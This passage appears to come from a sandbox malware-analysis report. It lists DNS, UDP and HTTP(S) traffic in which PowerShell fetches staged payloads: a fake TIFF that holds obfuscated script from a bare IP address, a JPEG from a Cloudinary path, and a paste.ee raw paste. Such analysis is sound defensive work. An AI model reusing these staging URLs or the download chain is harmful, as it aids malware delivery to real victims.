Dec 17, 2024 07:21:52.726607084 CET	49760	443	192.168.2.5	104.21.84.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 07:21:25.706855059 CET	62508	53	192.168.2.5	1.1.1.1
Dec 17, 2024 07:21:25.846084118 CET	53	62508	1.1.1.1	192.168.2.5
Dec 17, 2024 07:21:49.954020977 CET	56389	53	192.168.2.5	1.1.1.1
Dec 17, 2024 07:21:50.092463970 CET	53	56389	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 07:21:25.706855059 CET	192.168.2.5	1.1.1.1	0x37b0	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:49.954020977 CET	192.168.2.5	1.1.1.1	0x7ce1	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 07:21:25.846084118 CET	1.1.1.1	192.168.2.5	0x37b0	No error (0)	res.cloudinary.com	cloudinary.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 07:21:25.846084118 CET	1.1.1.1	192.168.2.5	0x37b0	No error (0)	cloudinary.map.fastly.net		151.101.1.137	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:25.846084118 CET	1.1.1.1	192.168.2.5	0x37b0	No error (0)	cloudinary.map.fastly.net		151.101.129.137	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:25.846084118 CET	1.1.1.1	192.168.2.5	0x37b0	No error (0)	cloudinary.map.fastly.net		151.101.193.137	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:25.846084118 CET	1.1.1.1	192.168.2.5	0x37b0	No error (0)	cloudinary.map.fastly.net		151.101.65.137	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:50.092463970 CET	1.1.1.1	192.168.2.5	0x7ce1	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Dec 17, 2024 07:21:50.092463970 CET	1.1.1.1	192.168.2.5	0x7ce1	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

res.cloudinary.com

paste.ee

172.245.123.12

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.245.123.12	80	7092	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 07:21:18.679857016 CET	336	OUT	GET /233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 172.245.123.12 Connection: Keep-Alive
Dec 17, 2024 07:21:19.797969103 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 06:21:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 16 Dec 2024 07:53:01 GMT ETag: "25a44-6295e7843c6ff" Accept-Ranges: bytes Content-Length: 154180 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 4b 00 4f 00 4c 00 51 00 6b 00 65 00 4c 00 4b 00 65 00 6d 00 43 00 67 00 6b 00 6b 00 78 00 20 00 3d 00 20 00 22 00 69 00 70 00 65 00 76 00 6e 00 57 00 72 00 4c 00 70 00 57 00 63 00 57 00 6b 00 70 00 62 00 22 00 0d 00 0a 00 4b 00 75 00 57 00 6b 00 4b 00 65 00 47 00 50 00 55 00 4c 00 7a 00 62 00 69 00 57 00 50 00 20 00 3d 00 20 00 22 00 4c 00 41 00 57 00 66 00 41 00 57 00 47 00 54 00 55 00 42 00 69 00 57 00 62 00 6e 00 4b 00 22 00 0d 00 0a 00 7a 00 64 00 76 00 69 00 6d 00 71 00 62 00 6b 00 72 00 6d 00 78 00 4b 00 50 00 64 00 63 00 20 00 3d 00 20 00 22 00 61 00 50 00 73 00 61 00 73 00 6f 00 48 00 49 00 4c 00 6f 00 4e 00 72 00 47 00 4b 00 7a 00 22 00 0d 00 0a 00 0d 00 0a 00 69 00 63 00 61 00 62 00 47 00 57 00 4b 00 48 00 4c 00 50 00 43 00 7a 00 67 00 54 00 41 00 20 00 3d 00 20 00 22 00 6b 00 47 00 4c 00 6d 00 4c 00 4c 00 76 00 47 00 63 00 4f 00 5a 00 71 00 72 00 6b 00 52 00 22 00 0d 00 0a 00 4b 00 41 00 50 00 41 00 75 00 47 00 63 00 4e 00 67 00 6d 00 [TRUNCATED] Data Ascii: KOLQkeLKemCgkkx = "ipevnWrLpWcWkpb"KuWkKeGPULzbiWP = "LAWfAWGTUBiWbnK"zdvimqbkrmxKPdc = "aPsasoHILoNrGKz"icabGWKHLPCzgTA = "kGLmLLvGcOZqrkR"KAPAuGcNgmWeCLA = "aZnPQLGBjaOzUbi"ptcACnkGALofUue = "JkemZRWLWfjdZcW"bjBiQWZLiaeWoLc = "nGWIWmLhbxqOLUf"dKdilekWsCxAoom = "AaOoNUOOfWLmzKL"GLzpiKzehPcKzUb = "aLPeLCPKcKGnGWx"HUWzpBicPKKJjhn = "AGTGshUixfhhQpW"RzeKKfdcuAPAOpe = "jGZnWAHWWZcHWzo"UbBZWNGhzdidTtU = "CzcNlcLiaALzUWb"JuAaue
Dec 17, 2024 07:21:19.798023939 CET	1236	IN	Data Raw: 00 69 00 52 00 69 00 68 00 57 00 6e 00 62 00 47 00 6d 00 20 00 3d 00 20 00 22 00 57 00 70 00 47 00 6b 00 64 00 4b 00 6f 00 4c 00 6b 00 47 00 50 00 68 00 57 00 43 00 4c 00 22 00 0d 00 0a 00 62 00 6e 00 57 00 65 00 6c 00 47 00 57 00 72 00 62 00 57 Data Ascii: iRihWnbGm = "WpGkdKoLkGPhWCL"bnWelGWrbWidGLf = "oLtPILAGGkodhzL"imLRIfhdLWgLrdi = "pACqKpGLmWGxTcS"LqTbiLuWNNWGJZ
Dec 17, 2024 07:21:19.798038960 CET	1236	IN	Data Raw: 00 66 00 5a 00 4c 00 6b 00 69 00 65 00 22 00 0d 00 0a 00 73 00 65 00 51 00 6b 00 6a 00 78 00 4c 00 50 00 4f 00 6b 00 41 00 6b 00 57 00 55 00 69 00 20 00 3d 00 20 00 22 00 52 00 4c 00 66 00 51 00 7a 00 57 00 4b 00 6b 00 74 00 57 00 73 00 4e 00 7a Data Ascii: fZLkie"seQkjxLPOkAkWUi = "RLfQzWKktWsNzzU"rKGKbqWeGgGOfhJ = "kGioSkGPiblLLei"cbdGCCKNJQUZcZP = "fRfuhUWWBUlkcPi"L
Dec 17, 2024 07:21:19.798083067 CET	1236	IN	Data Raw: 00 52 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 4b 00 5a 00 42 00 43 00 66 00 47 00 42 00 52 00 65 00 43 00 4e 00 41 00 55 00 57 00 22 00 0d 00 0a 00 4e 00 76 00 63 00 78 00 55 00 4c 00 6c 00 69 00 66 00 6c 00 71 00 65 00 62 00 6f 00 54 00 20 00 3d Data Ascii: RL = "KKZBCfGBReCNAUW"NvcxULliflqeboT = "zWILuUtWNzIHLLK"gKcQCWuLdKOpKWt = "ZloioWKOtenKNTR"WLdaZWATbpfNtAh = "KWmz
Dec 17, 2024 07:21:19.798154116 CET	1236	IN	Data Raw: 00 52 00 69 00 70 00 42 00 52 00 57 00 65 00 69 00 4c 00 6d 00 55 00 78 00 66 00 7a 00 55 00 20 00 3d 00 20 00 22 00 43 00 6e 00 5a 00 4b 00 63 00 73 00 69 00 52 00 63 00 4c 00 57 00 72 00 75 00 55 00 4b 00 22 00 0d 00 0a 00 55 00 70 00 65 00 4c Data Ascii: RipBRWeiLmUxfzU = "CnZKcsiRcLWruUK"UpeLTntWpzCUciP = "LflWWaKkBGxxzIx"LKeinWLhKmzUfrc = "CWWaKmUpWNGBKaI"LWbGhnWO
Dec 17, 2024 07:21:19.798177958 CET	1236	IN	Data Raw: 00 62 00 4c 00 57 00 72 00 66 00 53 00 4c 00 6f 00 4c 00 4b 00 4e 00 63 00 22 00 0d 00 0a 00 52 00 69 00 4e 00 4c 00 62 00 4f 00 4f 00 6a 00 4e 00 63 00 66 00 78 00 6b 00 41 00 51 00 20 00 3d 00 20 00 22 00 67 00 4c 00 54 00 52 00 47 00 4c 00 57 Data Ascii: bLWrfSLoLKNc"RiNLbOOjNcfxkAQ = "gLTRGLWieuuRKnf"hGhiziLaWxZdrlK = "AipoUppOLicChdB"LBuKOperaZicPLJ = "KLcLxfLKhdnfW
Dec 17, 2024 07:21:19.798214912 CET	1236	IN	Data Raw: 00 4c 00 71 00 62 00 6b 00 62 00 41 00 4b 00 49 00 20 00 3d 00 20 00 22 00 4a 00 4b 00 6c 00 6c 00 47 00 69 00 4c 00 4c 00 64 00 4f 00 4c 00 62 00 63 00 65 00 4a 00 22 00 0d 00 0a 00 6e 00 48 00 47 00 4c 00 4c 00 68 00 4c 00 66 00 69 00 63 00 57 Data Ascii: LqbkbAKI = "JKllGiLLdOLbceJ"nHGLLhLficWoKQN = "kWrLihsaUJeWmcm"QPQiNlUcCbpPqLo = "edKfaUUZPPKxLGP"PqWZuljKWHGmUio =
Dec 17, 2024 07:21:19.798428059 CET	1236	IN	Data Raw: 00 50 00 6a 00 55 00 22 00 0d 00 0a 00 63 00 63 00 75 00 47 00 61 00 63 00 69 00 57 00 73 00 57 00 63 00 51 00 6b 00 61 00 65 00 20 00 3d 00 20 00 22 00 57 00 69 00 71 00 4a 00 4c 00 7a 00 78 00 68 00 72 00 68 00 57 00 4c 00 4b 00 43 00 65 00 22 Data Ascii: PjU"ccuGaciWsWcQkae = "WiqJLzxhrhWLKCe"qGlGkWNGzGLcLtK = "zWAPUKbbOkKpULq"PUuCAmbcLpGHvhB = "PhfxfoZhUTULpfm"pG
Dec 17, 2024 07:21:19.798464060 CET	1236	IN	Data Raw: 00 3d 00 20 00 22 00 70 00 5a 00 6d 00 4b 00 69 00 7a 00 70 00 75 00 7a 00 66 00 51 00 73 00 63 00 4c 00 57 00 22 00 0d 00 0a 00 4c 00 50 00 6c 00 52 00 71 00 62 00 4c 00 4b 00 4b 00 4c 00 68 00 70 00 63 00 61 00 6c 00 20 00 3d 00 20 00 22 00 74 Data Ascii: = "pZmKizpuzfQscLW"LPlRqbLKKLhpcal = "tLelcLvxUPgGeBP"LSLKvoknLjKjKKW = "iWicWAoLWrhczLW"zTsHcoCradcRUtj = "UHoqtda
Dec 17, 2024 07:21:19.798538923 CET	1236	IN	Data Raw: 00 61 00 65 00 4e 00 70 00 63 00 47 00 47 00 4c 00 66 00 4a 00 55 00 51 00 7a 00 64 00 20 00 3d 00 20 00 22 00 69 00 64 00 43 00 47 00 66 00 41 00 6d 00 69 00 4e 00 70 00 48 00 62 00 6f 00 4c 00 63 00 22 00 0d 00 0a 00 63 00 47 00 5a 00 68 00 74 Data Ascii: aeNpcGGLfJUQzd = "idCGfAmiNpHboLc"cGZhtohipnCzAGG = "iAilOSgLUaCcSkR"mNLlqsmhhWPLoom = "WohWPWLGGZvGtkA"ALhsrlzjCiq
Dec 17, 2024 07:21:19.918241024 CET	1236	IN	Data Raw: 00 63 00 65 00 69 00 6f 00 57 00 4b 00 4c 00 78 00 43 00 22 00 0d 00 0a 00 54 00 66 00 4b 00 64 00 57 00 70 00 63 00 41 00 73 00 65 00 47 00 4c 00 50 00 63 00 6b 00 20 00 3d 00 20 00 22 00 57 00 55 00 69 00 42 00 69 00 62 00 47 00 6c 00 57 00 4c Data Ascii: ceioWKLxC"TfKdWpcAseGLPck = "WUiBibGlWLbmAaU"NeocGZrqbPALevh = "fgWZoApqBOPUzpN"uefbWdlWgLJLWNB = "WkLOahcippacWR

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	151.101.1.137	443	6084	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 06:21:27 UTC	127	OUT	GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1 Host: res.cloudinary.com Connection: Keep-Alive
2024-12-17 06:21:27 UTC	780	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2469849 Content-Type: image/jpeg Etag: "78bd258abedd7787714b5d9c33eb9212" Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT Date: Tue, 17 Dec 2024 06:21:27 GMT Strict-Transport-Security: max-age=604800 Cache-Control: public, no-transform, immutable, max-age=2592000 Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-17T06:21:27.357Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)" Server: Cloudinary Timing-Allow-Origin: * Access-Control-Allow-Origin: * Accept-Ranges: bytes X-Content-Type-Options: nosniff Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options x-request-id: fdecdd9b808625f2ef998baba5084d1b
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1\|\;,#o
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b Data Ascii: "t-&/{mO\| mv%sb_4{fIj[hutzq\|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9 Data Ascii: fmKfa&#ps5]&wde&\|W,o!p{bl n13D9\|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7 Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG\|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07 Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 Data Ascii: Iv14jpIF.UbX$Yi\|QUB81k}w1"eP}0cQ!KAN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a Data Ascii: Ux+,NG)UeUefI"w-n2^2@%2idutDCH=$WsSw4]GI@~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk>BDoGJp+m+{
2024-12-17 06:21:27 UTC	1378	IN	Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49760	104.21.84.67	443	6084	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 06:21:51 UTC	67	OUT	GET /r/et2L1/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-12-17 06:21:51 UTC	1286	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 06:21:51 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: HIT Age: 68698 Last-Modified: Mon, 16 Dec 2024 11:16:53 GMT Report-To: 